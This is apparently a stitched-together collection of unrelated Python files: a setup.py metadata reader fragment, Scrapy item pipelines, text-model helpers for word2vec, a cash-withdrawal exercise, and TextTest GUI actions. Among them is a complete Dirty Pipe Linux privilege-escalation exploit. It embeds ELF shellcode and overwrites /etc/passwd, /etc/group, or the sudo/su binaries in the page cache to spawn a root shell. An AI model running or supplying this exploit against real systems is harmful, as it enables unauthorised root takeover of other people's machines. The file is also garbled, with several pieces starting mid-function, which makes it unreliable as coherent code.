return value.s
elif isinstance(value, ast.Name):
variable = self._find_variable_in_body(body, value.id)
if variable is not None and isinstance(variable, ast.Str):
return variable.s
return None
def _find_in_call(self, call: ast.Call, name: str) -> Any | None:
for keyword in call.keywords:
if keyword.arg == name:
return keyword.value
return None
def _find_call_kwargs(self, call: ast.Call) -> Any | None:
kwargs = None
for keyword in call.keywords:
if keyword.arg is None:
kwargs = keyword.value
return kwargs
def _find_variable_in_body(
self, body: list[ast.stmt], name: str
) -> ast.expr | None:
for elem in body:
if not isinstance(elem, ast.Assign):
continue
for target in elem.targets:
if not isinstance(target, ast.Name):
continue
if target.id == name:
return elem.value
return None
def _find_in_dict(self, dict_: ast.Dict, name: str) -> ast.expr | None:
for key, val in zip(dict_.keys, dict_.values):
if isinstance(key, ast.Str) and key.s == name:
return val
return None
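# Usage sketch (the project path is hypothetical): read metadata from a
# project that ships a setup.py and/or setup.cfg without executing it.
#
#     info = SetupReader.read_from_directory("/path/to/project")
#     print(info["name"], info["version"], info["install_requires"])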
|
# -*- coding: utf-8 -*-
import re
import scrapy
import logging
from ..utils import get_soup
class ItemDebugPipeline(object):
"""Print item for debug"""
    def process_item(self, item: scrapy.Item, spider: scrapy.Spider) -> scrapy.Item:
for k, v in item.items():
spider.log('{}: {}'.format(k, v), logging.INFO)
return item
class ImagePipeline(object):
"""Extract images from content, replace img tags with placeholder and populagte 'image_urls' for download"""
def process_item(self, item: scrapy.Item, spider: scrapy.Spider) -> List:
if 'content' in item:
s = get_soup(item['content'])
images = s.select('img')
if len(images):
item['image_urls'] = [x['src'] for x in images]
item['content'] = re.sub(r'<img src=[^>]+\>', '{{@IMG}}', item['content'])
else:
item['image_urls'] = []
return item
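# Usage sketch (the module path is hypothetical): enable the pipelines in the
# Scrapy project's settings.py, with ImagePipeline running before the debug
# printer.
#
#     ITEM_PIPELINES = {
#         "myproject.pipelines.ImagePipeline": 300,
#         "myproject.pipelines.ItemDebugPipeline": 800,
#     }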
|
import logging
'''
G E T D A T A F R O M W O R D S U M
'''
'''
Get the file state and check whether it contains all the data needed for word2vec.
'''
def get_file_state(text_model):
logging.debug("Getting file state :")
if 'fileState' in text_model:
file_state = text_model['fileState']
else:
file_state = None
return file_state
'''
Get the narrator sentences from the whole text model.
Returns a list of paragraphs, each of which is a list of sentences.
'''
def get_text_model_narrator_paragraphs(text_model):
logging.debug("Getting all the narrator sentences of a text model")
paragraphs = []
for paragraph_model in text_model['paragraphStates']:
paragraphs.append(get_paragraph_model_narrator_sentences(paragraph_model))
return paragraphs
'''
Get the narrator sentences from a paragraph.
'''
def get_paragraph_model_narrator_sentences(paragraph_model):
logging.debug("Getting all the narrator sentences of the paragraph model.")
paragraph = []
for sentence_model in paragraph_model['sentenceStates']:
if sentence_model['dialogState']['dialog'] == False:
paragraph.append(sentence_model['sentence'])
return paragraph
'''
Get the dialog sentences from the whole text model.
Returns a list of paragraphs, each of which is a list of sentences.
'''
def get_text_model_dialog_paragraphs(text_model):
logging.debug("Getting all the narrator sentences of a text model")
paragraphs = []
for paragraph_model in text_model['paragraphStates']:
if paragraph_model['dialog'] == True:
paragraphs.append(get_paragraph_model_dialog_sentences(paragraph_model))
return paragraphs
'''
Get the dialog sentences from a paragraph.
'''
def get_paragraph_model_dialog_sentences(paragraph_model):
logging.debug("Getting all the dialog sentences of the paragraph model.")
paragraph = []
for sentence_model in paragraph_model['sentenceStates']:
if sentence_model['dialogState']['dialog'] == True:
paragraph.append(sentence_model['sentence'])
return paragraph
'''
This will take a paragraph model and get the sentence objects that have dialog objects.
'''
def get_dialog_object_connected_narrative_paragraph_model(paragraph_model):
logging.debug("Getting get_paragraph_model_narrator_with_dialog_sentence")
dialog_sentence_obj = []
for sentence_model in paragraph_model['sentenceStates']:
if sentence_model['dialogState']['dialog'] == True and 'originOfDialogFromOrderParagraph' in sentence_model['dialogState']:
dialog_sentence_obj.append(sentence_model)
return dialog_sentence_obj
'''
This function gets the narrative sentence connected by syntax to the dialog object.
'''
def get_narrative_with_dialog_object_paragraph_model(paragraph_model, originOfDialogFromOrderParagraph):
logging.debug("Getting get_remainder_narrator_connected_with_dialog_sentence")
sentence_sentence_obj = []
for sentence_model in paragraph_model['sentenceStates']:
if sentence_model['orderParagraph'] == originOfDialogFromOrderParagraph:
sentence_sentence_obj.append(sentence_model)
return sentence_sentence_obj
'''
Gets all the dialog sentences connected to a dialog object.
'''
def get_dialog_connected_dialog_object_paragraph_model(paragraph_model, originOfDialogFromOrderParagraph):
logging.debug("Getting get_remainder_narrator_connected_with_dialog_sentence")
sentence_sentence_obj = []
for sentence_model in paragraph_model['sentenceStates']:
if sentence_model['orderParagraph'] == originOfDialogFromOrderParagraph:
sentence_sentence_obj.append(sentence_model)
return sentence_sentence_obj
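# Shape of the text_model these helpers expect, inferred from the keys accessed
# above (all values are illustrative):
#
#     text_model = {
#         'fileState': {...},
#         'paragraphStates': [{
#             'dialog': False,
#             'sentenceStates': [{
#                 'sentence': 'Some sentence text.',
#                 'orderParagraph': 0,
#                 'dialogState': {
#                     'dialog': False,
#                     # only on dialog sentences tied to a narrator sentence:
#                     'originOfDialogFromOrderParagraph': 0,
#                 },
#             }],
#         }],
#     }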
|
################################################################################
# Author: Marc Bohler - https://github.com/crusoe112 #
# #
# Description: Uses Dirty Pipe vulnerability to pop a root shell using Python #
# #
# Credits: This code basically combines 2 existing poc's for dirty pipe: #
# https://github.com/febinrev/dirtypipez-exploit #
# https://github.com/eremus-dev/Dirty-Pipe-sudo-poc #
# Those projects, in turn, borrowed directly from the OG: #
# Max Kellermann max.kellermann@ionos.com #
# https://dirtypipe.cm4all.com/ #
# #
# Usage: python dirty.py #
# #
# Requirements: Requires python >= 3.10 because of os.splice                  #
# #
# Notes: This exploit will overwrite a page of the file that resides in #
# the page cache. It is unlikely to corrupt the actual file. If #
# there is corruption or an error, you likely just need to wait #
# until the page is overwritten, or restart your computer to fix #
# any problems. #
# That being said, I bear no responsibility for damage done by #
# this code, so please read carefully and hack responsibly. #
# Be sure to check out Max Kellermann's writeup at cm4all.com as              #
# well. #
################################################################################
import argparse
import sys
import pty
import os
import getpass
import subprocess
import platform
from os.path import exists
# Kernel page size
PAGE = 4096
# Linux pipe buffers are 64K
PIPESIZE = 65536
###########################################################
# Small (linux x86_64) ELF file matroshka doll that does: #
# fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); #
# write(fd, elfcode, elfcode_len) #
# chmod("/tmp/sh", 04755) #
# close(fd); #
# exit(0); #
# #
# The dropped ELF simply does: #
# setuid(0); #
# setgid(0); #
# execve("/bin/sh", ["/bin/sh", NULL], [NULL]); #
# #
# Credit: https://github.com/febinrev/dirtypipez-exploit #
###########################################################
elfcode = [
0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00,
0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d,
0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, 0x00, 0x00,
0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7,
0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0xba, 0x00,
0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1c,
0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, 0x48, 0xc7,
0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7,
0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, 0x70, 0x2f,
0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01,
0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,
0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, 0x00, 0x00,
0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, 0x00, 0x00,
0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, 0x6a, 0x00,
0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, 0x3b, 0x00,
0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f,
0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
]
def backup_file(path, backup_path):
"""Back up just for working on the POC"""
with open(path, 'rb') as orig_file:
with open(backup_path, 'wb') as backup:
data = orig_file.read()
backup.write(data)
def prepare_pipe(read: int, write: int) -> None:
""" Contaminate the pipe flags by filling and draining """
data = b'a' * PIPESIZE
written = os.write(write, data)
print(f'[*] {written} bytes written to pipe')
data = os.read(read, PIPESIZE)
print(f'[*] {len(data)} bytes read from pipe')
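# Why fill-and-drain works (see Max Kellermann's Dirty Pipe writeup referenced
# in the header): writing a full 64K marks every ring entry of the pipe with
# PIPE_BUF_FLAG_CAN_MERGE, and reading it all back frees the buffers while
# leaving those flags set. The page spliced in next is therefore treated as
# mergeable, so the following os.write() lands directly in the page cache of
# the read-only target file.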
def run_poc(data: bytes, path: str, file_offset: int) -> None:
""" Open target file, contaminate the pipe buff, call splice, write into target file """
print(f'[*] Opening {path}')
target_file = os.open(path, os.O_RDONLY)
print('[*] Opening PIPE')
r, w = os.pipe()
print('[*] Contaminating PIPE_BUF_CAN_MERGE flags')
prepare_pipe(r, w)
print(f'[*] Splicing byte from {path} to pipe')
n = os.splice(
target_file,
w,
1,
offset_src=file_offset
)
print(f'[*] Spliced {n} bytes')
print(f'[*] Altering {path}')
n = os.write(w, data)
print(f'[*] {n} bytes written to {path}')
def find_offset_of_user_in_passwd(user):
file_offset = 0
to_write = ''
with open('/etc/passwd', 'r') as passwd:
for line in passwd.readlines():
            if user not in line:
file_offset += len(line)
else:
fields = line.split(':')
file_offset += len(':'.join(fields[:1]))
original = ':'.join(fields[1:]) # Save original for recovering
to_write = ':0:' + ':'.join(fields[3:]) # Set no passwd and uid 0
# Pad end of line with new line chars so we don't error
length_diff = len(original) - len(to_write)
if length_diff > 0:
to_write = to_write[:-1] + ('\n' * length_diff) + '\n'
return file_offset, to_write, original
return False
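# Illustrative transformation (user name and ids are hypothetical): for a line
#
#     alice:x:1000:1000:Alice:/home/alice:/bin/bash
#
# the bytes after "alice" are overwritten so the line becomes
#
#     alice::0:1000:Alice:/home/alice:/bin/bash
#
# i.e. an empty password field and uid 0, padded with newlines to preserve the
# original line length.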
def find_offset_of_sudo_in_group(user):
file_offset = 0
to_write = ''
with open('/etc/group', 'r') as group:
orig_file = group.read()
group.seek(0)
for line in group.readlines():
fields = line.split(':')
            if fields[0].strip() != 'sudo':
file_offset += len(line)
else:
file_offset += len(line) - 1
to_write = f',{user}\n'
try:
# Save original for recovering
original = orig_file[file_offset:file_offset+len(to_write)]
except IndexError:
return False # Cannot be last line of file
return file_offset - 1, to_write, original
return False
def within_page_bounds(file_offset, data_len):
# Ensure that we are not at a page boundary
if file_offset % PAGE == 0:
print(f'[x] Cannot exploit start of page boundary with offset {file_offset}')
print('[x] Do you have access to another user?')
print('[x] Remember to clean up /tmp/backup_file')
return False
    if (file_offset | (PAGE - 1)) < (file_offset + data_len):
        print(f'[x] Cannot perform exploit across page boundary with offset {file_offset}')
        print('[x] Do you have access to another user?')
        print('[x] Remember to clean up any backup files left in /tmp')
        return False
return True
def check_etc_passwd():
# Check if /etc/passwd exists
if not exists('/etc/passwd'):
return False
# Check if current user has login
user = getpass.getuser()
offset_data = find_offset_of_user_in_passwd(user)
if not offset_data:
return False
# Check if on boundary
if not within_page_bounds(offset_data[0], len(offset_data[1])):
return False
return True
def check_etc_group():
if not exists('/etc/group'):
return False
user = getpass.getuser()
offset_data = find_offset_of_sudo_in_group(user)
if not offset_data:
return False
if not within_page_bounds(offset_data[0], len(offset_data[1])):
return False
return True
def which(cmd):
return subprocess.getoutput(f'which {cmd}').strip()
def check_elf(cmd):
sudo_path = which(cmd)
if not exists(sudo_path):
return False
# Check if x86_64
if not platform.architecture(sudo_path) == ('64bit', 'ELF'):
return False
if not within_page_bounds(1, len(elfcode)):
return False
return True
def run_elf(binary_name):
# Backup file
binary_path = which(binary_name)
backup_path = f'/tmp/{binary_name}'
print(f'[*] Backing up {binary_path} to {backup_path}')
backup_file(binary_path, backup_path)
# Set offset
file_offset = 1
# Save original
print(f'[*] Saving original state of {binary_path}')
with open(binary_path, 'rb') as binary:
orig_data = binary.read(len(elfcode) + 2)[2:]
# Exploit
print(f'[*] Hijacking {binary_path}')
run_poc(bytes(elfcode), binary_path, file_offset)
# Run modified binary
print(f'[*] Executing modified {binary_path}')
os.system(binary_path)
# Restore state
print(f'[*] Restoring {binary_path}')
run_poc(orig_data, binary_path, file_offset)
# Pop a shell
print(f'[*] Popping root shell...')
print()
pty.spawn('/tmp/sh')
print()
# Cleanup
print(f'[!] Remember to cleanup {backup_path} and /tmp/sh')
print(f'[!] rm {backup_path}')
print('[!] rm /tmp/sh')
def run_etc_passwd():
# Backup file
backup_path = '/tmp/passwd'
target_file = '/etc/passwd'
print(f'[*] Backing up {target_file} to {backup_path}')
backup_file(target_file, backup_path)
# Get offset
user = getpass.getuser()
print(f'[*] Calculating offset of {user} in {target_file}')
(file_offset,
data_to_write,
original) = find_offset_of_user_in_passwd(user)
# Exploit
print(f'[*] Hijacking {target_file}')
run_poc(bytes(data_to_write, 'utf-8'), target_file, file_offset)
# Pop a shell
print(f'[*] Popping root shell...')
print()
pty.spawn(['su', user])
print()
print(f'[*] Restoring {target_file}')
run_poc(bytes(original, 'utf-8'), target_file, file_offset)
print(f'[!] Remember to cleanup {backup_path}')
print(f'[!] rm {backup_path}')
def run_etc_group():
# Backup file
backup_path = '/tmp/group'
target_file = '/etc/group'
print(f'[*] Backing up {target_file} to {backup_path}')
backup_file(target_file, backup_path)
# Get offset
user = getpass.getuser()
print(f'[*] Calculating offset of {user} in {target_file}')
(file_offset,
data_to_write,
original) = find_offset_of_sudo_in_group(user)
# Exploit
print(f'[*] Hijacking {target_file}')
run_poc(bytes(data_to_write, 'utf-8'), target_file, file_offset)
# Pop a shell
print(f'[*] Popping root shell...')
print()
print(f'[!] Login with password of {user} (you will have to login twice)')
print()
# Login as user to refresh groups, then call sudo su in a pseudo terminal with -P flag
pty.spawn(['su', user, '-P', '-c', 'sudo su'])
print()
print(f'[*] Restoring {target_file}')
run_poc(bytes(original, 'utf-8'), target_file, file_offset)
print(f'[!] Remember to cleanup {backup_path}')
print(f'[!] rm {backup_path}')
def main():
parser = argparse.ArgumentParser(description='Use dirty pipe vulnerability to pop root shell')
parser.add_argument('--target', choices=['passwd','group','sudo','su'], help='The target read-only file to overwrite')
args = parser.parse_args()
if not args.target or args.target == 'passwd':
print(f'[*] Attempting to modify /etc/passwd')
if check_etc_passwd():
run_etc_passwd()
sys.exit()
print(f'[X] Cannot modify /etc/passwd')
if not args.target or args.target == 'sudo':
print(f'[*] Attempting to modify sudo binary')
if check_elf('sudo'):
run_elf('sudo')
sys.exit()
print(f'[X] Cannot modify sudo binary')
if not args.target or args.target == 'su':
print(f'[*] Attempting to modify su binary')
if check_elf('su'):
run_elf('su')
sys.exit()
print(f'[X] Cannot modify su binary')
if not args.target or args.target == 'group':
print(f'[*] Attempting to modify /etc/group')
if check_etc_group():
run_etc_group()
sys.exit()
print(f'[X] Cannot modify /etc/group')
print(f'[X] Exploit could not be executed!')
if __name__ == '__main__':
main()
|
n50 = n20 = n10 = n1 = 0
n = int(input('What amount will be withdrawn? '))
valortotal = n
while True:
if n >= 50:
n = n-50
n50 += 1
elif n >= 20:
n = n-20
n20 += 1
elif n >= 10:
n = n-10
n10 += 1
elif n >= 1:
n = n-1
n1 += 1
else:
break
print('The following notes will be dispensed:')
if n50 != 0:
    print(f'{n50} notes of R$50.00')
if n20 != 0:
    print(f'{n20} notes of R$20.00')
if n10 != 0:
    print(f'{n10} notes of R$10.00')
if n1 != 0:
    print(f'{n1} notes of R$1.00')
print(f'For a total withdrawal of R${valortotal}')
|
"""
All the actions for administering the files and directories in a test suite
"""
import gtk, plugins, os, shutil, subprocess, testmodel, re
from .. import guiplugins, guiutils
from ordereddict import OrderedDict
from zipfile import ZipFile
from fnmatch import fnmatch
# Cut, copy and paste
class FocusDependentAction(guiplugins.ActionGUI):
def notifyTopWindow(self, window):
guiplugins.ActionGUI.notifyTopWindow(self, window)
window.connect("set-focus", self.focusChanged)
def focusChanged(self, dummy, widget):
freeTextWidget = isinstance(widget, gtk.Entry) or isinstance(widget, gtk.TextView)
if freeTextWidget:
self.setSensitivity(False)
elif self.isActiveOnCurrent():
self.setSensitivity(True)
class ClipboardAction(FocusDependentAction):
def isActiveOnCurrent(self, *args):
if guiplugins.ActionGUI.isActiveOnCurrent(self, *args):
for test in self.currTestSelection:
if test.parent:
return True
return False
def getSignalsSent(self):
return [ "Clipboard" ]
def _getStockId(self):
return self.getName()
def _getTitle(self):
return "_" + self.getName().capitalize()
def getTooltip(self):
return self.getName().capitalize() + " selected tests"
def noAncestorsSelected(self, test):
if not test.parent:
return True
if test.parent in self.currTestSelection:
return False
else:
return self.noAncestorsSelected(test.parent)
def performOnCurrent(self):
# If suites are selected, don't also select their contents
testsForClipboard = filter(self.noAncestorsSelected, self.currTestSelection)
self.notify("Clipboard", testsForClipboard, cut=self.shouldCut())
class CopyTests(ClipboardAction):
def getName(self):
return "copy"
def shouldCut(self):
return False
class CutTests(ClipboardAction):
def getName(self):
return "cut"
def shouldCut(self):
return True
class PasteTests(FocusDependentAction):
def __init__(self, *args):
FocusDependentAction.__init__(self, *args)
self.clipboardTests = []
self.removeAfter = False
def singleTestOnly(self):
return True
def _getStockId(self):
return "paste"
def _getTitle(self):
return "_Paste"
def getTooltip(self):
return "Paste tests from clipboard"
def notifyClipboard(self, tests, cut=False):
self.clipboardTests = tests
self.removeAfter = cut
self.setSensitivity(True)
def isActiveOnCurrent(self, test=None, state=None):
return guiplugins.ActionGUI.isActiveOnCurrent(self, test, state) and len(self.clipboardTests) > 0
def getCurrentTestMatchingApp(self, test):
# Try the exact application first, if that fails, look for extra-version
for currTest in self.currTestSelection:
if currTest.app == test.app:
return currTest
for currTest in self.currTestSelection:
if currTest.app.name == test.app.name:
return currTest
def getDestinationInfo(self, test):
currTest = self.getCurrentTestMatchingApp(test)
if currTest is None:
return None, 0
if currTest.classId() == "test-suite" and currTest not in self.clipboardTests:
return currTest, 0
else:
return currTest.parent, currTest.positionInParent() + 1
def getNewTestName(self, suite, oldName):
existingTest = suite.findSubtest(oldName)
if not existingTest:
dirName = suite.getNewDirectoryName(oldName)
if not os.path.exists(dirName):
return oldName
elif self.willBeRemoved(existingTest):
return oldName
nextNameCandidate = self.findNextNameCandidate(oldName)
return self.getNewTestName(suite, nextNameCandidate)
def willBeRemoved(self, test):
return self.removeAfter and test in self.clipboardTests
def findNextNameCandidate(self, name):
copyPos = name.find("_copy_")
if copyPos != -1:
copyEndPos = copyPos + 6
number = int(name[copyEndPos:])
return name[:copyEndPos] + str(number + 1)
elif name.endswith("copy"):
return name + "_2"
else:
return name + "_copy"
def getNewDescription(self, test):
if len(test.description) or self.removeAfter:
return test.description
else:
return "Copy of " + test.name
def getRepositionPlacement(self, test, placement):
currPos = test.positionInParent()
if placement > currPos:
return placement - 1
else:
return placement
def messageAfterPerform(self):
pass # do it below...
def performOnCurrent(self):
newTests = []
destInfo = OrderedDict()
for test in self.clipboardTests:
suite, placement = self.getDestinationInfo(test)
if suite:
newName = self.getNewTestName(suite, test.name)
destInfo[test] = suite, placement, newName
if len(destInfo) == 0:
raise plugins.TextTestError, "Cannot paste test there, as the copied test and currently selected test have no application/version in common"
suiteDeltas = {} # When we insert as we go along, need to update subsequent placements
for test, (suite, placement, newName) in destInfo.items():
suiteDeltas.setdefault(suite, 0)
realPlacement = placement + suiteDeltas.get(suite)
if self.removeAfter and newName == test.name and suite is test.parent:
# Cut + paste to the same suite is basically a reposition, do it as one action
repositionPlacement = self.getRepositionPlacement(test, realPlacement)
plugins.tryFileChange(test.parent.repositionTest, "Failed to reposition test: no permissions to edit the testsuite file",
test, repositionPlacement)
newTests.append(test)
else:
newDesc = self.getNewDescription(test)
# Create test files first, so that if it fails due to e.g. full disk, we won't register the test either...
testDir = suite.getNewDirectoryName(newName)
try:
self.moveOrCopy(test, testDir)
suite.registerTest(newName, newDesc, realPlacement)
testImported = suite.addTest(test.__class__, os.path.basename(testDir), newDesc, realPlacement)
# "testImported" might in fact be a suite: in which case we should read all the new subtests which
# might have also been copied
testImported.readContents(initial=False)
testImported.updateAllRelPaths(test.getRelPath())
suiteDeltas[suite] += 1
newTests.append(testImported)
if self.removeAfter:
message = "Failed to remove old test: didn't have sufficient write permission to the test files. Test copied instead of moved."
plugins.tryFileChange(test.remove, message)
except EnvironmentError, e:
if os.path.isdir(testDir):
shutil.rmtree(testDir)
self.showErrorDialog("Failed to paste test:\n" + str(e))
self.notify("SetTestSelection", newTests)
self.currTestSelection = newTests
self.notify("Status", self.getStatusMessage(suiteDeltas))
if self.removeAfter:
# After a paste from cut, subsequent pastes should behave like copies of the new tests
self.notify("Clipboard", newTests, cut=False)
self.clipboardTests = newTests
self.removeAfter = False
for suite, placement, newName in destInfo.values():
suite.contentChanged()
def getStatusMessage(self, suiteDeltas):
suiteName = suiteDeltas.keys()[0].name
if self.removeAfter:
return "Moved " + self.describeTests() + " to suite '" + suiteName + "'"
else:
return "Pasted " + self.describeTests() + " to suite '" + suiteName + "'"
def getSignalsSent(self):
return [ "SetTestSelection", "Clipboard" ]
def moveOrCopy(self, test, newDirName):
# If it exists it's because a previous copy has already taken across the directory
if not os.path.isdir(newDirName):
oldDirName = test.getDirectory()
if self.removeAfter:
self.movePath(oldDirName, newDirName)
else:
self.copyPath(oldDirName, newDirName)
# Methods overridden by version control
@staticmethod
def movePath(oldDirName, newDirName):
os.rename(oldDirName, newDirName)
@staticmethod
def copyPath(oldDirName, newDirName):
shutil.copytree(oldDirName, newDirName, ignore=shutil.ignore_patterns(*plugins.controlDirNames))
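# How the clipboard actions fit together: CopyTests and CutTests emit a
# "Clipboard" notification carrying the selected tests (cut=True for a cut).
# PasteTests stores them in notifyClipboard, and performOnCurrent then copies
# or moves the test directories and registers the new tests in the destination
# suite, treating a cut+paste within the same suite as a simple reposition.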
# And a generic import test. Note acts on test suites
class ImportTest(guiplugins.ActionDialogGUI):
def __init__(self, *args):
guiplugins.ActionDialogGUI.__init__(self, *args)
self.optionGroup.addOption("name", self.getNameTitle())
self.optionGroup.addOption("desc", self.getDescTitle(), description="Enter a description of the new " + self.testType().lower() + " which will be inserted as a comment in the testsuite file.", multilineEntry=True)
self.optionGroup.addOption("testpos", self.getPlaceTitle(), "last in suite", allocateNofValues=2, description="Where in the test suite should the test be placed?")
self.testsImported = []
def getConfirmationMessage(self):
testName = self.getNewTestName()
suite = self.getDestinationSuite()
self.checkName(suite, testName)
newDir = os.path.join(suite.getDirectory(), testName)
if os.path.isdir(newDir):
if self.testFilesExist(newDir, suite.app):
raise plugins.TextTestError, "Test already exists for application " + suite.app.fullName() + \
" : " + os.path.basename(newDir)
else:
return "Test directory already exists for '" + testName + "'\nAre you sure you want to use this name?"
else:
return ""
def _getStockId(self):
return "add"
def getSizeAsWindowFraction(self):
# size of the dialog
return 0.5, 0.45
def testFilesExist(self, dir, app):
for fileName in os.listdir(dir):
parts = fileName.split(".")
if len(parts) > 1 and parts[1] == app.name:
return True
return False
def singleTestOnly(self):
return True
def correctTestClass(self):
return "test-suite"
def getNameTitle(self):
return self.testType() + " Name"
def getDescTitle(self):
return self.testType() + " Description"
def getPlaceTitle(self):
return "\nPlace " + self.testType()
def getDefaultName(self):
return ""
def getDefaultDesc(self):
return ""
def updateOptions(self):
self.optionGroup.setOptionValue("name", self.getDefaultName())
self.optionGroup.setOptionValue("desc", self.getDefaultDesc())
self.setPlacements(self.currTestSelection[0])
return True
def setPlacements(self, suite):
# Add suite and its children
placements = [ "first in suite" ]
for test in suite.testcases:
placements.append("after " + test.name)
placements.append("last in suite")
self.optionGroup.setPossibleValues("testpos", placements)
self.optionGroup.getOption("testpos").reset()
def _getTitle(self):
return "Add " + self.testType()
def testType(self): #pragma : no cover - doc only
return ""
def messageAfterPerform(self):
if len(self.testsImported):
return "Added new " + ", ".join((repr(test) for test in self.testsImported))
def getNewTestName(self):
        # Overridden in subclasses - occasionally it can be inferred
return self.optionGroup.getOptionValue("name").strip()
def performOnCurrent(self):
testName = self.getNewTestName()
description = self.optionGroup.getOptionValue("desc")
placement = self.getPlacement()
self.testsImported = []
for suite in self.currTestSelection:
suite.registerTest(testName, description, placement)
testDir = suite.makeSubDirectory(testName)
self.testsImported.append(self.createTestContents(suite, testDir, description, placement))
suite.contentChanged()
self.notify("SetTestSelection", self.testsImported)
def getSignalsSent(self):
return [ "SetTestSelection" ]
def getDestinationSuite(self):
return self.currTestSelection[0]
def getPlacement(self):
option = self.optionGroup.getOption("testpos")
return option.possibleValues.index(option.getValue())
def checkName(self, suite, testName):
if len(testName) == 0:
raise plugins.TextTestError, "No name given for new " + self.testType() + "!" + "\n" + \
"Fill in the 'Adding " + self.testType() + "' tab below."
if testName.find(" ") != -1:
raise plugins.TextTestError, "The new " + self.testType() + \
" name is not permitted to contain spaces, please specify another"
for test in suite.testcases:
if test.name == testName:
raise plugins.TextTestError, "A " + self.testType() + " with the name '" + \
testName + "' already exists, please choose another name"
class ImportTestCase(ImportTest):
def __init__(self, *args):
ImportTest.__init__(self, *args)
self.addDefinitionFileOption()
def testType(self):
return "Test"
def addDefinitionFileOption(self):
self.addOption("opt", "Command line options")
def createTestContents(self, suite, testDir, description, placement):
self.writeDefinitionFiles(suite, testDir)
self.writeEnvironmentFile(suite, testDir)
self.writeResultsFiles(suite, testDir)
return suite.addTestCase(os.path.basename(testDir), description, placement)
def getWriteFileName(self, name, suite, testDir):
return os.path.join(testDir, name + "." + suite.app.name)
def getWriteFile(self, name, suite, testDir):
return open(self.getWriteFileName(name, suite, testDir), "w")
def writeEnvironmentFile(self, suite, testDir):
envDir = self.getEnvironment(suite)
if len(envDir) == 0:
return
envFile = self.getWriteFile("environment", suite, testDir)
for var, value in envDir.items():
envFile.write(var + ":" + value + "\n")
envFile.close()
def writeDefinitionFiles(self, suite, testDir):
optionString = self.getOptions(suite)
if len(optionString):
optionFile = self.getWriteFile("options", suite, testDir)
optionFile.write(optionString + "\n")
return optionString
def getOptions(self, *args):
return self.optionGroup.getOptionValue("opt")
def getEnvironment(self, *args):
return {}
def writeResultsFiles(self, suite, testDir):
# Cannot do anything in general
pass
class ImportTestSuite(ImportTest):
def __init__(self, *args):
ImportTest.__init__(self, *args)
self.addEnvironmentFileOptions()
def testType(self):
return "Suite"
def createTestContents(self, suite, testDir, description, placement):
return suite.addTestSuite(os.path.basename(testDir), description, placement, self.writeEnvironmentFiles)
def addEnvironmentFileOptions(self):
self.addSwitch("env", "Add environment file")
def writeEnvironmentFiles(self, newSuite):
if self.optionGroup.getSwitchValue("env"):
envFile = os.path.join(newSuite.getDirectory(), "environment")
            with open(envFile, "w") as f:
                f.write("# Dictionary of environment variables to set in the test suite\n")
class ImportApplication(guiplugins.ActionDialogGUI):
